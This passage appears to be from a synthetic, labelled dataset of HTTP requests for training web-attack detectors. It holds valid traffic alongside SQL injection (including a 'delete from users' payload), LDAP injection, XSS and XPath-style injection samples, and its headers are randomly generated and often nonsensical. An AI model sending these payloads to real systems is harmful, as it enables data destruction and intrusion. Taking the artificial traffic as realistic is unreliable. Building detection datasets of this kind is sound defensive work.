Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sun, 16 Sep 07 06:35:52 GMT
ETag: W/"NVeYXAYynVJ6NfI.SKRd"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Mon, 15 Jan 07 05:19:48 GMT
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: "w5zN0vj4csCx6..4"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: "EGN7EWnDVpWSVv@psEe7"
Max-Forwards: 05
MIME-Version: 7.5
Pragma: kKhM='d'
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: kafm nueHo=9tvYovua
Range: -15,703-20624,9752-7
Referer: /ntihoqwo/oeGaea.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: viKY.ui http://www.LefTL.gov
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 502x021
Via: 9.0 89.46.11.46
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TofQllwHio5=nldspx' or  1<  5ee/4aola/sb/child::text()[position()=772]  or     'i8ntsSuo'='&zdoikshenis=<bodyked

End - Id: 35545
Start - Id: 27151
class: Valid
GET /tqlvGu5lODKDg-hQ/0iq3kn/iNHgx/5bKzzreplace9Eg/eienovnEsimebh/eal2drl9skEomitwea/ZdhZNhdSXPpbdeletegA.gif?eJnn5=2J7WUPE&0oenheqt=3&fsnRo1=%403&nffheystTrwtym3=r9%3D&Ihodnitxaems6et=aNit+&ima=ko&p259=Hkpwo&voEus0weR=+%26aoo+s%3Etl&et9Nt=osIiselectBo%28ih-rvservices5iwp- HTTP/1.0
Host: 224.18.166.234
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: Iatsa-eyinanu;q=0.3, sp-3rmft, ohimT5lg-cttsc;q=0.7
Cache-Control: max-stale=214
Client-ip: 198.90.183.128
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="32"
Date: Sat, 13 Aug 05 09:31:06 GMT
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Mon, 01 Mar 10 02:33:34 GMT
If-Unmodified-Since: Fri, 13 Mar 09 10:10:16 UTC
If-Match: *
If-None-Match: "GukGMT3iN1_suKq8ah0"
If-Range: Mon, 08 Nov 04 04:53:44 GMT
Max-Forwards: 7
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest username="eiadaa"
Authorization: Basic c0ZNUmx6ZTpvdXRx
Range: 1622-
Referer: http://www.dleou2y.ch/3Teo/emid/pai2u5zd/eohtc/ud47ltoo.swf
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/0.3 (Windows; U; WinNT 2.5; st-do; rv:6.2.7) Gecko/15401860
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7096x553
Via: 4.0 24.19.116.106
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 162.49.222.6
X-Serial-Number: 0352610
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27151
Start - Id: 41729
class: SqlInjection
GET /rnm5g55novnrui/5ricc/Aglrtgscgntn/aaocn7EecnpeOw/erBuf7RvY46IiM/home1bUlsGJw/oawiAeipeEir.css?6Irnti=%27+%29%3B+delete++++from++users%3B+++commit%3B+++++dummy%28+%27&jZbeinne=uTwdFShg&7dwjetagieoe=9631&6n6l=307&3IHnw=hi&muef=t%298eV&k5ejik=2l&lsTtsnntobhti=996646&K8_vPN=tEwgaon7&9tmpKevalbodyaSX=%5DaQent HTTP/1.1
Host: www.lhcuna4Nw.be
Connection: ttGg1
Accept: text/html;q=0.4
Accept-Charset: x-mac-arabic;q=0.7, windows-1250;q=0.2, iso-8859-3, windows-1258
Accept-Encoding: 
Accept-Language: my1u-ct, ucz0h-eaoe;q=0.7, lt-se;q=0.3, yr1-eobEbht;q=0.0, r-taoceaz;q=0.1
Cache-Control: no-cache
Client-ip: 130.12.152.206
Cookie: dirwr2l4oa=p/crrgn8;edxaiMctoe=sd7B23ju;p6esqnwgdxh=2220;ln3=09253259;eenlvhrnro=-iacd/where 5g;r6aohrn=840
Cookie2: $Version="023"
Date: Mon, 20 Apr 09 10:16:13 GMT
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Sun, 13 May 07 17:53:02 CET
If-Unmodified-Since: Tue, 01 Apr 08 21:28:37 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: "cH@68Vmwmedvr3XtHDRM"
Max-Forwards: 073
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bHU2dGQ6bWN0Tndp
Range: 111-,-67748,-483206
Referer: http://www.llrig.it/nbeEoO/o5an5n/dhntmqg.asmx
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: sheue/6.2
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: HTTP/3.2 251.85.107.240, 6.7 47.169.235.190:0146
Transfer-Encoding: lrso; hnzirn=Erekhe
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 775994
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41729
Start - Id: 38896
class: LdapInjection
GET /o0fecjv/p1Jylibt_p/f-V2YfYtL86/ppsmwaAa/h9bE@YudP3/iUw-3sdKM-7D/eor3NZOZ1LcYh5T.gif?5nbSoaa57alr=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&t9F_N=8OBK09rl HTTP/1.1
Host: www.hmyip.org
Connection: 0ioh
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, compress;q=0.7, compress;q=0.9, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: min-fresh=580
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="375"
Date: Sun, 01 Jun 08 06:48:38 CET
ETag: W/"vf-qQST2l5aPOHxwweG3"
Expect: 100-continue
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 19 Nov 08 04:45:55 GMT
If-Unmodified-Since: Fri, 30 May 08 15:09:26 CET
If-Match: "nLBIXCmGCcmnXuq"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://FaaeNvi5.de/eb1i/frntyteh/rtgq/thmu0aeu/3ufhnjt.bin
Authorization: Basic aTAxU2F3Omlycms=
Range: 15934-,799-8058,-81465
Referer: /fghnei.png
TE: trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: ev22YUf http://www.titiexS.be
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 7.6 245.51.25.71
Transfer-Encoding: gzip
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 103 16.254.149.96 "EttkoaUmriatd4" "Thu, 02 Mar 06 19:59:35 CET"
X-Forwarded-For: 250.105.147.78
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38896
Start - Id: 16122
class: Valid
GET /PexecSfnU.lwSUnposition/Wands9qFAt6a1/8yaslhiosleC/9e3teoorb8txgznt/oeIkYC-N/miptipmcowenzhU/iframev@R/hpmWLY_r1q.v5.html?Wctyfdeisstheas=N1phpiwrsrle&stelo1He47n=898192&offiiho8teCs=tmp+Vrwindow.open&jto=cete&ha8lyae1ptuoi=em%7Ex6leeut&plre9ur=reii HTTP/1.0
Host: www.ialmieni.it
Connection: close
Accept: */*
Accept-Charset: us-ascii, x-mac-roman, x-mac-turkish;q=0.0
Accept-Encoding: identity;q=0.3, deflate, identity;q=0.8, gzip, gzip
Accept-Language: fgrgDHjf-a6, zoeec-tbea, t4hoahr-iEnlg, osae-f7;q=0.6, esi-nreewBcy;q=0.1
Cache-Control: min-fresh=7
Client-ip: 52.195.250.238
Cookie: UQ5dtpIj=aj0nnJwjYu;leas9y5ytAjnog=8 etsa9pydkrs inputnsW;e4qee= ce scriptlnn&dcsUmSx;oOU5tii=p2Gd0NjH.Si;hriUvbscriptC5=ouOaxdcr)ipbrsl
Cookie2: $Version="7"
Date: Tue, 18 Dec 07 04:30:58 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 1ebbA3Jq
From: c2a1pa@8itiJl.de
If-Modified-Since: Mon, 17 Jul 06 01:40:51 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:08:46 CET
If-Match: "EMjGf1rwmXZCPopS"
If-None-Match: "km201qEctfLtT8b"
If-Range: *
Max-Forwards: 26
MIME-Version: 2.7
Pragma: le99so='ph'
Proxy-Authorization: NTLM YTRlaTBsc3JzbXNudGVicmxhTGhyZWl3aXVob05sNWZyc3Bkcg==
Authorization: NTLM bm55aG11bzZzdGxuT3c4ODJzcGFlMnZPc2FzdDR0NHQ5N3JzdHRw
Range: 215-,20-
Referer: http://www.pbeh3t3.org/Utaeto/ibrtmo/owml8/3lzt.mdb
TE: chunked;q=0.1,trailers,gzip;q=0.8
Trailer: Pragma
User-Agent: Mozilla/5.0 (Windows; U; WinNT 3.5; dm-ae; rv:0.4.6) Gecko/97428775
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8164x933
Via: 3u7eai/7.4 www.atbt.jpeg
Transfer-Encoding: compress
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16122
Start - Id: 46548
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: www.PAobh.uk:90225
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 23.69.31.217
Cookie: lsiiaet4oF3lu6o=tkraourtesmdlrsey;NbF@2IOy=EbeyemmrnSw
Cookie2: $Version="88"
Date: Mon, 31 Oct 05 22:52:02 UTC
ETag: W/"u2fAqilJFYAF0Ew"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 02 Sep 07 10:24:22 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "xIRzK16jp7t-YVqterIT"
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Sat, 16 Jul 05 05:59:22 CET
Max-Forwards: 309
MIME-Version: 6.0
Pragma: nLt4dRoh='eara'
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest realm
Range: 2794-2,-4107
Referer: http://www.8enDnxea.fr/uasuriee/fimf/atyeia.jsp
TE: trailers,trailers
Trailer: Pragma
User-Agent: abiJi-0Pd http://www.uTas8.biz
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: 3.6 www.leDaou.jpeg, 1.5 36.110.101.55
Transfer-Encoding: deflate
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 705 81.237.142.6 "esee7ectnt" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46548
Start - Id: 22625
class: Valid
GET /tjaeapbIus4ms/gwftcsdhhrpe/tqbPC2kC/ntPa/rtkenlegEa/8ikowP../zfPQf6qnG@zWmO5Xxl7/BukW6ynanchEree.shtml? HTTP/1.1
Host: 93.41.123.214:35817
Connection: close
Accept: image/*, audio/basic;q=0.6, audio/*
Accept-Charset: windows-1250, windows-874
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=0521
Client-ip: 158.13.254.69
Cookie: .d5.-V5j=t=;rsPovaliIehIeu=42;yyenix4cu=tpy
Cookie2: $Version="84"
Date: Mon, 26 Jan 04 23:22:14 GMT
ETag: W/"cUnGLaaSXEnKtn8o"
Expect: 100-continue
From: 4tEywso@ngmrMaatec.st
If-Modified-Since: Sat, 11 Mar 06 08:00:20 CET
If-Unmodified-Since: Thu, 27 Mar 08 23:13:19 UTC
If-Match: "5MOlpEkHPXY1xrcCj"
If-None-Match: "jia22OSPoaQ._qg3I"
If-Range: Wed, 25 Feb 04 21:52:18 GMT
Max-Forwards: 12
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic aGVvZW46MWRjMWVo
Authorization: Digest nonce
Range: -43745
Referer: /eMoShla.zip
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Windows; U; Win98 6.1; Oc-Ac; rv:6.1.0) Gecko/18231088
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 9.2 www.nhas.tiff, FTP/3.9 www.4ub3bp.tiff, 8.4 139.77.208.57
Transfer-Encoding: nltu
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22625
Start - Id: 33645
class: Valid
POST /t0-mE_rUXCGuu75K4Bw/%ucTNjqpsoDxMs/a8o/bCipwdtriwLios/xCv5Mxb_/dc7@5bg9gl4n0a@s/oNgbp9rf/sSRRDt-mQv3lf4lO/CR/hEN25/e7BBAYbS/iy3foeenmeeh.pl? HTTP/1.0
Content-Length: 67
Content-Language: lbiE,1i
Content-Encoding: compress
Content-Location: /rsys2ac/wseh.rar
Content-MD5: SXRFdEVndHlPeUdmdGFBaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 24:54:17 CET
Last-Modified: Wed, 30 Mar 05 16:49:42 UTC
Host: 87.82.91.130:60029
Connection: close
Accept: image/png, audio/x-wav
Accept-Charset: shift_jis, euc-cn;q=0.0, x-mac-japanese
Accept-Encoding: 
Accept-Language: rweditor-w0atf, vegM6e2a-5;q=0.3, ponait5-n6eo
Cache-Control: min-fresh=0449
Client-ip: 143.123.191.1
Cookie: iti8aabIspus=k;ferrhyyu=esetduaebautoexecxp_+he
Cookie2: $Version="136"
Date: Fri, 16 Nov 07 06:16:29 UTC
ETag: "vvLw1PZsucRgJpckrD"
Expect: 100-continue
From: diro@y1e50IxI.com
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Wed, 10 Mar 04 21:37:42 GMT
If-Match: "T4QU0Oa4HH5rocWwdJ"
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 8.9
Pragma: a=di
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM N2U1aW9ndEVjbTczcGVyZ3Nyc0FqOXdmd29kaGR3Ym1zbjB6cm44
Range: 585-81
Referer: http://p6ttt.uk/ve9heraq/ml7crbe.dll
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.7 (X11; U; Linux i586 4.9; wf-Si; rv:4.5.3) Gecko/65132343
UA-CPU: PowerPC
UA-Disp: 6340,3688,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3257x6651
Via: 4.3 251.171.133.210, FTP/0.8 www.sd5Reid.jpeg:2311, FTP/0.2 216.81.130.83
Transfer-Encoding: identity
Upgrade: blpli/8.6, r6g3h/7.3, 2d0tle/0.6, a9l1ou/3.7
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

Zcsbitj=s+d&trgellhhahwnb=Tswr xa&hA2Iih1dpr=anfz&GJ3jid.@Nm=4936

End - Id: 33645
Start - Id: 12370
class: Valid
GET /fz@/uX-/eungrasOsatdjp/agJUfRRDx14SeW/yyeoger8rC9/hnenUl.msf?bder=mwGSxd3&inoSD@window.open=065&ttudticzmVr=6&te9s=U&7_access_logc-AT_=rFjrw4OEKbh&0xfeninosubejh=aodauh&.KJog@=eA%5Do&tg=819781&nh=e9zlstyle HTTP/1.1
Host: www.uycueei6sp.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 106.46.241.48
Cookie: ot793cfat6ln6= l&ieilo;hsownepttrerl=spositionn l%;g5SsedEiao3lC=6872045;RmS@=sraeeee92nPi
Cookie2: $Version="226"
Date: Sun, 14 May 06 11:29:41 GMT
ETag: "FOZwW_a@Zcz.2gvM"
Expect: 58eo=J2ehihen;ewaeiah=i5ci13a
From: Tnnrip@eam1hohoia.org
If-Modified-Since: Tue, 29 Aug 06 17:01:23 GMT
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: *
If-None-Match: "vixM5TLgsg8GXJC"
If-Range: "ith9PWCFho7SG@_Nsk"
Max-Forwards: 29
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: netha1 Ulceegm=ttdj9Za
Authorization: 19Orw ee43=sMeyL
Range: -93802
Referer: http://hBco.it/xKaretd/heIeAso/atsIa0Yd.pdf
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 7.4; cz-yh; rv:4.9.9) Gecko/34964128
UA-CPU: 68000
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: HTTP/5.1 156.228.36.141, 0.2 www.stiie.css, soai/2.4 www.tdfon.htm
Transfer-Encoding: identity
Upgrade: cnml/5.7, shtng/2.0, aHtns/7.2, ylt/4.9
Warning: 155 www.Relra.js "wlpmsltmlaebo4e" "Wed, 06 Sep 06 04:06:20 CET"
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12370
Start - Id: 5465
class: Valid
PUT /toUfJm_/dlZqq5oDv6Pfj@2svPm/8rccr/tthoiojatnooy/nti.aspx? HTTP/1.0
Content-Length: 79
Content-Language: ng,osoLuoe,wb
Content-Encoding: compress
Content-Location: /tapCs/cehicn/wxtoa5i/Atxirad.asp
Content-MD5: eWV2eWVhY3RtZWl0ZWhUZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Nov 08 03:55:38 CET
Last-Modified: Thu, 22 Jan 04 15:29:28 GMT
Host: www.5toomodl7e.it:80
Connection: 9ubit
Accept: video/*;q=0.4, video/*;q=0.9
Accept-Charset: iso-8859-6;q=0.6, isiri-3342;q=0.0, x-mac-chinesesimp;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 45.222.201.177
Cookie: sil=oMjB-o@Pp;bjpjaocihtM3n8r=05790758;i5pz=4809
Cookie2: $Version="55"
Date: Tue, 02 Mar 10 11:12:10 CET
ETag: W/"MbtmetX_lvBRSRuluA"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Wed, 06 Jun 07 08:48:23 GMT
If-Unmodified-Since: Mon, 14 Jan 08 05:59:27 GMT
If-Match: *
If-None-Match: "Knr1dM7x@.3H@sEwqSo"
If-Range: "GqNUMKZnQ-bxD5TZo"
Max-Forwards: 2
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: ihia rmnrene=dfrald
Range: 25867-
Referer: /mntoec/4oinito.jsp
TE: chunked,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (Windows; U; Win98 2.7; bo-wc; rv:7.6.7) Gecko/25388562
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 898x7009
Via: 8.3 0.177.65.4
Transfer-Encoding: identity
Upgrade: rU2fTf/8.3
Warning: 491 www.oslwek6d.jpeg "8ehtsoioNMA22qLoeil" "Sat, 30 Jun 07 11:58:04 CET"
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 757852
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xerf=7It&ed6yn=y8rxtsiuay&JLn_F=0&sqaCn=/eeahfhx&QdU6jdl=grr&OoHeidYcars=8638

End - Id: 5465
Start - Id: 1464
class: Valid
GET /rGSk/ughtio/sPk4G.mspx?oginiAnh4=898&s6=ayRiahiframe&dgkw=t-u&-Ky9BfIFR=iF%40XrPq&mgQ5nQ54qzfrom=x0Y HTTP/1.0
Host: www.saic.com
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 117.124.28.244
Cookie: nO5045DonX=6;Ek=02040;eeseEtarfep2lea=47;geSeod=n6hD
Cookie2: $Version="38"
Date: Fri, 28 Oct 05 17:00:17 CET
ETag: "WG89NQNyO8y@F9D1y"
Expect: 100-continue
From: ayUe@ld4t.org
If-Modified-Since: Sun, 17 Jul 05 13:17:52 GMT
If-Unmodified-Since: Sun, 06 Mar 05 15:20:18 GMT
If-Match: "eKi14HtSzTst8K8XjsPI"
If-None-Match: "hCeIutYlaCDMafcg"
If-Range: Sat, 04 Mar 06 08:45:01 GMT
Max-Forwards: 5
MIME-Version: 0.3
Pragma: aEtOe='iexr'
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: NTLM ZHRoZXRyaHNhbm9NYXJlenJpaGdsTnNpbjRheWY4c3Q=
Range: -64,0-
Referer: http://www.Teenia.net/gFl9nnr0/rEid/2enett.dll
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.5 (Windows; U; Win 9x 6.1; vp-rt; rv:6.1.0) Gecko/52060008
UA-CPU: x86
UA-Disp: 1923,599,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0275x4653
Via: sddhsy/3.6 168.1.130.103, FTP/0.5 29.1.186.70
Transfer-Encoding: compress
Upgrade: kr1Di0/3.6, i6oen/5.3
Warning: 048 www.resetlo.js "j7eznorhohrr83qef4f" 
X-Forwarded-For: 102.122.203.235
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1464
Start - Id: 41687
class: SqlInjection
GET /9Zl8dV/aU@r.OdA/aXt/hEsmr/oZ/tceTmss2/a7VV6EZntyn8@C.swf?z6taodr2=97NLu&ghrh=TH&coa5DiTaatbdo=eai0bcllEnin&EnBacirpoSnl=558234&nd7e=745&oneosed6pN9=1&adivsrEtutrP=lecpeeohteyehaee3a&9no2l=96472&3enece9apEco=i2r%40&ee7t7nc=445653&oWffme3nanoan=5ddp8&eUCdreplaceautoexeczDu3.R=%3F&etjcnl7ylo=%27UNIONALLSELECTfieldFROMransatWHERE%27%27++%3D++%27&7Tiaesinct=863 HTTP/1.1
Host: www.heNO.com:239
Connection: 4shenos2
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=6977
Client-ip: 117.10.50.69
Cookie: th=@cscriptm;execVbetweenIconnectSx95=lirdon8ssvhcopenW
Cookie2: $Version="1"
Date: Tue, 21 Nov 06 05:14:41 CET
ETag: "_JdHqc5lPurFiLmz"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Wed, 28 Jan 09 20:35:06 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 4
MIME-Version: 7.5
Pragma: pmhldf=lo
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: -39
Referer: /ieety.mspx
TE: deflate;q=0.2,chunked,trailers
Trailer: Max-Forwards
User-Agent: aefiniE (uKRyKOi)
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0003x3071
Via: HTTP/1.7 www.Eeih.png, 8.5 www.sokh38p.jpeg
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41687
Start - Id: 22891
class: Valid
GET /7NVS3hGtaJ.png?h5rhnota=a0se-umbdnen&i5nUsesgju=21952&3e=35&3BUv1V=iru&eiIi6iho9a=xedhool&d4paAz=aAu7DM.k7&RSnph-dxpc=gHnBnos&lu1T=mql&ia=25090653&rnfsec=414209 HTTP/1.1
Host: www.xi88a3lna.gov
Connection: noimicu
Accept: video/*, application/*
Accept-Charset: x-mac-cyrillic;q=0.4, x-mac-japanese;q=0.3, iso-2022-kr, euc-tw;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 250.14.63.166
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="986"
Date: Tue, 06 Feb 07 21:18:46 CET
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: 100-continue
From: aseiiog@zr5aou.org
If-Modified-Since: Thu, 06 Aug 09 19:59:52 UTC
If-Unmodified-Since: Thu, 17 Apr 08 24:49:57 CET
If-Match: "V4h95rkLbI2AKF@"
If-None-Match: *
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 637
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Digest realm
Range: 37032-5753,-977
Referer: http://ausepy.gov/6gru.mpeg
TE: trailers,chunked;q=0.3,deflate;q=0.2
Trailer: Trailer
User-Agent: 3extachm (t1EkT0Wzp; 8Mvh.hpRs; fWixRQd7mx; ighD_h1; iCId4A)
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: FTP/1.8 www.nren5.jpeg, 3.3 58.178.115.134
Transfer-Encoding: deflate
Upgrade: enatdd/2.0, rmbvnI/8.6
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22891
Start - Id: 15077
class: Valid
GET /ihc4.swf?W89eUo@Y4J0=17157900&lrltl6dnmaTaepr=oidtwfmMeEtee&ce=027354&rDchildF9F.d=897&qy=eelonbkas&uo6ts8at=1tLtkgbXZjgj&st7utrhrRF=ei37U%40vBY0mn&u3oyessE=%5B&i3tmd2O=oa5cydleor&Sad1verlsaiimtd=3170&Ceeehgeju=9725235&elrezouaadjn6=TtqvI HTTP/1.0
Host: 167.139.8.133
Connection: close
Accept: text/*;q=0.2
Accept-Charset: x-mac-roman;q=0.6
Accept-Encoding: deflate;q=0.0, identity, deflate;q=0.7, compress, deflate
Accept-Language: yruhtubs-Csd, edt-n, inetydli-Ooaenl, Ttds-olvphAhm;q=0.7
Cache-Control: no-store
Client-ip: 59.230.105.90
Cookie: uiEinirlofoSs=imaesnufeY;0Lsock_stream7GYgD=|i  ;8homeHnph-dqPsam=n/u
Cookie2: $Version="0"
Date: Mon, 21 Sep 09 24:31:25 GMT
ETag: "JV0OLiFIhzERD6l"
Expect: 100-continue
From: yoa7I@ropq1e.be
If-Modified-Since: Tue, 20 Feb 07 23:42:28 UTC
If-Unmodified-Since: Thu, 18 Dec 08 17:24:21 CET
If-Match: "V1X497TcsEvfmT."
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 2.9
Pragma: e9fhwee=omeDda
